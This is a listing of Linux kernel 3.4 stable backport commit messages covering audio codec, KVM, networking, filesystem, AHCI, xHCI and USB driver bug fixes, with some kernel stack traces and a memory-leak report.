      Signed-off-by: default avatarDmitry Torokhov <dmitry.torokhov@gmail.com>
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      dacca44e
    • Zidan Wang's avatar
      ASoC: wm8994: correct BCLK DIV 348 to 384 · a9fee8d4
      Zidan Wang authored
      commit 17fc2e0a upstream.
      
      According to the RM of wm8958, BCLK DIV 348 doesn't exist, correct it
      to 384.
      Signed-off-by: default avatarZidan Wang <zidan.wang@freescale.com>
      Acked-by: default avatarCharles Keepax <ckeepax@opensource.wolfsonmicro.com>
      Signed-off-by: default avatarMark Brown <broonie@kernel.org>
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      a9fee8d4
    • Zidan Wang's avatar
      ASoC: wm8960: fix "RINPUT3" audio route error · 85a5c134
      Zidan Wang authored
      commit 85e36a1f upstream.
      
      It should be "RINPUT3" instead of "LINPUT3" route to "Right Input
      Mixer".
      Signed-off-by: default avatarZidan Wang <zidan.wang@freescale.com>
      Acked-by: default avatarCharles Keepax <ckeepax@opensource.wolfsonmicro.com>
      Signed-off-by: default avatarMark Brown <broonie@kernel.org>
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      85a5c134
    • Paolo Bonzini's avatar
      KVM: MMU: fix CR4.SMEP=1, CR0.WP=0 with shadow pages · 6713867c
      Paolo Bonzini authored
      commit 89876115 upstream.
      
      smep_andnot_wp is initialized in kvm_init_shadow_mmu and shadow pages
      should not be reused for different values of it.  Thus, it has to be
      added to the mask in kvm_mmu_pte_write.
      Reviewed-by: default avatarXiao Guangrong <guangrong.xiao@linux.intel.com>
      Signed-off-by: default avatarPaolo Bonzini <pbonzini@redhat.com>
      [lizf: Backported to 3.4: adjust context]
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      6713867c
    • Janusz Dziedzic's avatar
      mac80211: move WEP tailroom size check · 8450ced9
      Janusz Dziedzic authored
      commit 47b4e1fc upstream.
      
      Remove checking tailroom when adding IV as it uses only
      headroom, and move the check to the ICV generation that
      actually needs the tailroom.
      
      In other case I hit such warning and datapath don't work,
      when testing:
      - IBSS + WEP
      - ath9k with hw crypt enabled
      - IPv6 data (ping6)
      
      WARNING: CPU: 3 PID: 13301 at net/mac80211/wep.c:102 ieee80211_wep_add_iv+0x129/0x190 [mac80211]()
      [...]
      Call Trace:
      [<ffffffff817bf491>] dump_stack+0x45/0x57
      [<ffffffff8107746a>] warn_slowpath_common+0x8a/0xc0
      [<ffffffff8107755a>] warn_slowpath_null+0x1a/0x20
      [<ffffffffc09ae109>] ieee80211_wep_add_iv+0x129/0x190 [mac80211]
      [<ffffffffc09ae7ab>] ieee80211_crypto_wep_encrypt+0x6b/0xd0 [mac80211]
      [<ffffffffc09d3fb1>] invoke_tx_handlers+0xc51/0xf30 [mac80211]
      [...]
      Signed-off-by: default avatarJanusz Dziedzic <janusz.dziedzic@tieto.com>
      Signed-off-by: default avatarJohannes Berg <johannes.berg@intel.com>
      [lizf: Backported to 3.4: s/IEEE80211_WEP/_WEP/g]
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      8450ced9
    • Tommi Rantala's avatar
      ipvs: fix memory leak in ip_vs_ctl.c · 6c25c767
      Tommi Rantala authored
      commit f30bf2a5 upstream.
      
      Fix memory leak introduced in commit a0840e2e ("IPVS: netns,
      ip_vs_ctl local vars moved to ipvs struct."):
      
      unreferenced object 0xffff88005785b800 (size 2048):
        comm "(-localed)", pid 1434, jiffies 4294755650 (age 1421.089s)
        hex dump (first 32 bytes):
          bb 89 0b 83 ff ff ff ff b0 78 f0 4e 00 88 ff ff  .........x.N....
          04 00 00 00 a4 01 00 00 00 00 00 00 00 00 00 00  ................
        backtrace:
          [<ffffffff8262ea8e>] kmemleak_alloc+0x4e/0xb0
          [<ffffffff811fba74>] __kmalloc_track_caller+0x244/0x430
          [<ffffffff811b88a0>] kmemdup+0x20/0x50
          [<ffffffff823276b7>] ip_vs_control_net_init+0x1f7/0x510
          [<ffffffff8231d630>] __ip_vs_init+0x100/0x250
          [<ffffffff822363a1>] ops_init+0x41/0x190
          [<ffffffff82236583>] setup_net+0x93/0x150
          [<ffffffff82236cc2>] copy_net_ns+0x82/0x140
          [<ffffffff810ab13d>] create_new_namespaces+0xfd/0x190
          [<ffffffff810ab49a>] unshare_nsproxy_namespaces+0x5a/0xc0
          [<ffffffff810833e3>] SyS_unshare+0x173/0x310
          [<ffffffff8265cbd7>] system_call_fastpath+0x12/0x6f
          [<ffffffffffffffff>] 0xffffffffffffffff
      
      Fixes: a0840e2e ("IPVS: netns, ip_vs_ctl local vars moved to ipvs struct.")
      Signed-off-by: default avatarTommi Rantala <tt.rantala@gmail.com>
      Acked-by: default avatarJulian Anastasov <ja@ssi.bg>
      Signed-off-by: default avatarSimon Horman <horms@verge.net.au>
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      6c25c767
    • Eryu Guan's avatar
      ext4: check for zero length extent explicitly · fc83d2a4
      Eryu Guan authored
      commit 2f974865 upstream.
      
      The following commit introduced a bug when checking for zero length extent
      
      5946d089 ext4: check for overlapping extents in ext4_valid_extent_entries()
      
      Zero length extent could pass the check if lblock is zero.
      
      Adding the explicit check for zero length back.
      Signed-off-by: default avatarEryu Guan <guaneryu@gmail.com>
      Signed-off-by: default avatarTheodore Ts'o <tytso@mit.edu>
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      fc83d2a4
    • Christian König's avatar
      drm/radeon: fix VM_CONTEXT*_PAGE_TABLE_END_ADDR handling · e92c5425
      Christian König authored
      commit 607d4806 upstream.
      
      The mapping range is inclusive between starting and ending addresses.
      Signed-off-by: default avatarChristian König <christian.koenig@amd.com>
      Signed-off-by: default avatarAlex Deucher <alexander.deucher@amd.com>
      [lizf: Backported to 3.4:
       - adjust context
       - drop the change to clk.c
       - drop the second change in cayman_pcie_gart_enable()]
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      e92c5425
    • Nicolas Schichan's avatar
      ARM: net: delegate filter to kernel interpreter when imm_offset() return value... · 48b33c5b
      Nicolas Schichan authored
      ARM: net: delegate filter to kernel interpreter when imm_offset() return value can't fit into 12bits.
      
      commit 0b59d880 upstream.
      
      The ARM JIT code emits "ldr rX, [pc, #offset]" to access the literal
      pool. #offset maximum value is 4095 and if the generated code is too
      large, the #offset value can overflow and not point to the expected
      slot in the literal pool. Additionally, when overflow occurs, bits of
      the overflow can end up changing the destination register of the ldr
      instruction.
      
      Fix that by detecting the overflow in imm_offset() and setting a flag
      that is checked for each BPF instructions converted in
      build_body(). As of now it can only be detected in the second pass. As
      a result the second build_body() call can now fail, so add the
      corresponding cleanup code in that case.
      
      Using multiple literal pools in the JITed code is going to require
      lots of intrusive changes to the JIT code (which would better be done
      as a feature instead of fix), just delegating to the kernel BPF
      interpreter in that case is a more straight forward, minimal fix and
      easy to backport.
      
      Fixes: ddecdfce ("ARM: 7259/3: net: JIT compiler for packet filters")
      Signed-off-by: default avatarNicolas Schichan <nschichan@freebox.fr>
      Acked-by: default avatarDaniel Borkmann <daniel@iogearbox.net>
      Signed-off-by: default avatarDavid S. Miller <davem@davemloft.net>
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      48b33c5b
    • Dan Williams's avatar
      ahci: avoton port-disable reset-quirk · f5d35596
      Dan Williams authored
      commit dbfe8ef5 upstream.
      
      Avoton AHCI occasionally sees drive probe timeouts at driver load time.
      When this happens SCR_STATUS indicates device detected, but no D2H FIS
      reception.  Reset the internal link state machines by bouncing
      port-enable in the PCS register when this occurs.
      Signed-off-by: default avatarDan Williams <dan.j.williams@intel.com>
      Signed-off-by: default avatarTejun Heo <tj@kernel.org>
      [lizf: Backported to 3.4:
       - adjust context
       - use ahci_start_engine() instead of hpriv->start_engine()]
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      f5d35596
    • Rob Herring's avatar
      ahci: un-staticize ahci_dev_classify · 467d87ef
      Rob Herring authored
      commit bbb4ab43 upstream.
      
      Make ahci_dev_classify available to the ahci platform driver for custom
      hard reset function.
      Signed-off-by: default avatarRob Herring <rob.herring@calxeda.com>
      Signed-off-by: default avatarJeff Garzik <jgarzik@redhat.com>
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      467d87ef
    • Hans de Goede's avatar
      usb-storage: Add NO_WP_DETECT quirk for Lacie 059f:0651 devices · 2868a88c
      Hans de Goede authored
      commit 17211509 upstream.
      
      Without this flag some versions of these enclosures do not work.
      Reported-and-tested-by: default avatarChristian Schaller <cschalle@redhat.com>
      Signed-off-by: default avatarHans de Goede <hdegoede@redhat.com>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      2868a88c
    • Joe Lawrence's avatar
      xhci: gracefully handle xhci_irq dead device · 6da66b35
      Joe Lawrence authored
      commit 948fa135 upstream.
      
      If the xHCI host controller has died (ie, device removed) or suffered
      other serious fatal error (STS_FATAL), then xhci_irq should handle this
      condition with IRQ_HANDLED instead of -ESHUTDOWN.
      Signed-off-by: default avatarJoe Lawrence <joe.lawrence@stratus.com>
      Signed-off-by: default avatarMathias Nyman <mathias.nyman@linux.intel.com>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      6da66b35
    • Mathias Nyman's avatar
      xhci: Solve full event ring by increasing TRBS_PER_SEGMENT to 256 · 0a15af08
      Mathias Nyman authored
      commit 18cc2f4c upstream.
      
      Our event ring consists of only one segment, and we risk filling
      the event ring in case we get isoc transfers with short intervals
      such as webcams that fill a TD every microframe (125us)
      
      With 64 TRB segment size one usb camera could fill the event ring in 8ms.
      A setup with several cameras and other devices can fill up the
      event ring as it is shared between all devices.
      This has occurred when uvcvideo queues 5 * 32TD URBs which then
      get cancelled when the video mode changes. The cancelled URBs are returned
      in the xhci interrupt context and blocks the interrupt handler from
      handling the new events.
      
      A full event ring will block xhci from scheduling traffic and affect all
      devices conneted to the xhci, will see errors such as Missed Service
      Intervals for isoc devices, and  and Split transaction errors for LS/FS
      interrupt devices.
      
      Increasing the TRB_PER_SEGMENT will also increase the default endpoint ring
      size, which is welcome as for most isoc transfer we had to dynamically
      expand the endpoint ring anyway to be able to queue the 5 * 32TDs uvcvideo
      queues.
      
      The default size used to be 64 TRBs per segment
      Signed-off-by: default avatarMathias Nyman <mathias.nyman@linux.intel.com>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      0a15af08
    • Mathias Nyman's avatar
      xhci: fix isoc endpoint dequeue from advancing too far on transaction error · 3451d0f5
      Mathias Nyman authored
      commit d104d015 upstream.
      
      Isoc TDs usually consist of one TRB, sometimes two. When all goes well we
      receive only one success event for a TD, and move the dequeue pointer to
      the next TD.
      
      This fails if the TD consists of two TRBs and we get a transfer error
      on the first TRB, we will then see two events for that TD.
      
      Fix this by making sure the event we get is for the last TRB in that TD
      before moving the dequeue pointer to the next TD. This will resolve some
      of the uvc and dvb issues with the
      "ERROR Transfer event TRB DMA ptr not part of current TD" error message
      Signed-off-by: default avatarMathias Nyman <mathias.nyman@linux.intel.com>
      Signed-off-by: default avatarGreg Kroah-Hartman <gregkh@linuxfoundation.org>
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      3451d0f5
    • NeilBrown's avatar
      md/raid5: don't record new size if resize_stripes fails. · ece8cda0
      NeilBrown authored
      commit 6e9eac2d upstream.
      
      If any memory allocation in resize_stripes fails we will return
      -ENOMEM, but in some cases we update conf->pool_size anyway.
      
      This means that if we try again, the allocations will be assumed
      to be larger than they are, and badness results.
      
      So only update pool_size if there is no error.
      
      This bug was introduced in 2.6.17 and the patch is suitable for
      -stable.
      
      Fixes: ad01c9e3 ("[PATCH] md: Allow stripes to be expanded in preparation for expanding an array")
      Signed-off-by: default avatarNeilBrown <neilb@suse.de>
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      ece8cda0
    • Christoph Hellwig's avatar
      nfsd: fix the check for confirmed openowner in nfs4_preprocess_stateid_op · 80fc8f6a
      Christoph Hellwig authored
      commit ebe9cb3b upstream.
      
      If we find a non-confirmed openowner we jump to exit the function, but do
      not set an error value.  Fix this by factoring out a helper to do the
      check and properly set the error from nfsd4_validate_stateid.
      Signed-off-by: default avatarChristoph Hellwig <hch@lst.de>
      Signed-off-by: default avatarJ. Bruce Fields <bfields@redhat.com>
      [lizf: adjust the changes for nfsd4_validate_stateid()]
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      80fc8f6a
    • Jason A. Donenfeld's avatar
      USB: visor: Match I330 phone more precisely · 9f0a120b
      Jason A. Donenfeld authored
      commit 82ee3aeb upstream.
      
      Samsung has just released a portable USB3 SSD, coming in a very small
      and nice form factor. It's USB ID is 04e8:8001, which unfortunately is
      already used by the Palm Visor driver for the Samsung I330 phone cradle.
      Having pl2303 or visor pick up this device ID results in conflicts with
      the usb-storage driver, which handles the newly released portable USB3
      SSD.
      
      To work around this conflict, I've dug up a mailing list post [1] from a
      long time ago, in which a user posts the full USB descriptor
      information. The most specific value in this appears to be the interface
      class, which has value 255 (0xff). Since usb-storage requires an
      interface class of 0x8, I believe it's correct to disambiguate the two
      devices by matching on 0xff inside visor.
      
      [1] http://permalink.gmane.org/gmane.linux.usb.user/4264Signed-off-by: default avatarJason A. Donenfeld <Jason@zx2c4.com>
      Fixes: 1da177e4 ("Linux-2.6.12-rc2")
      Signed-off-by: default avatarJohan Hovold <johan@kernel.org>
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      9f0a120b
    • Jason A. Donenfeld's avatar
      USB: pl2303: Remove support for Samsung I330 · 6fc22860
      Jason A. Donenfeld authored
      commit 48ef23a4 upstream.
      
      This phone is already supported by the visor driver.
      Signed-off-by: default avatarJason A. Donenfeld <Jason@zx2c4.com>
      Fixes: 1da177e4 ("Linux-2.6.12-rc2")
      Signed-off-by: default avatarJohan Hovold <johan@kernel.org>
      [lizf: Backported to 3.4: adjust context]
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      6fc22860
    • Mark Edwards's avatar
      USB: cp210x: add ID for KCF Technologies PRN device · 1378ad23
      Mark Edwards authored
      commit c735ed74 upstream.
      
      Added the USB serial console device ID for KCF Technologies PRN device
      which has a USB port for its serial console.
      Signed-off-by: default avatarMark Edwards <sonofaforester@gmail.com>
      Signed-off-by: default avatarJohan Hovold <johan@kernel.org>
      Signed-off-by: default avatarZefan Li <lizefan@huawei.com>
      1378ad23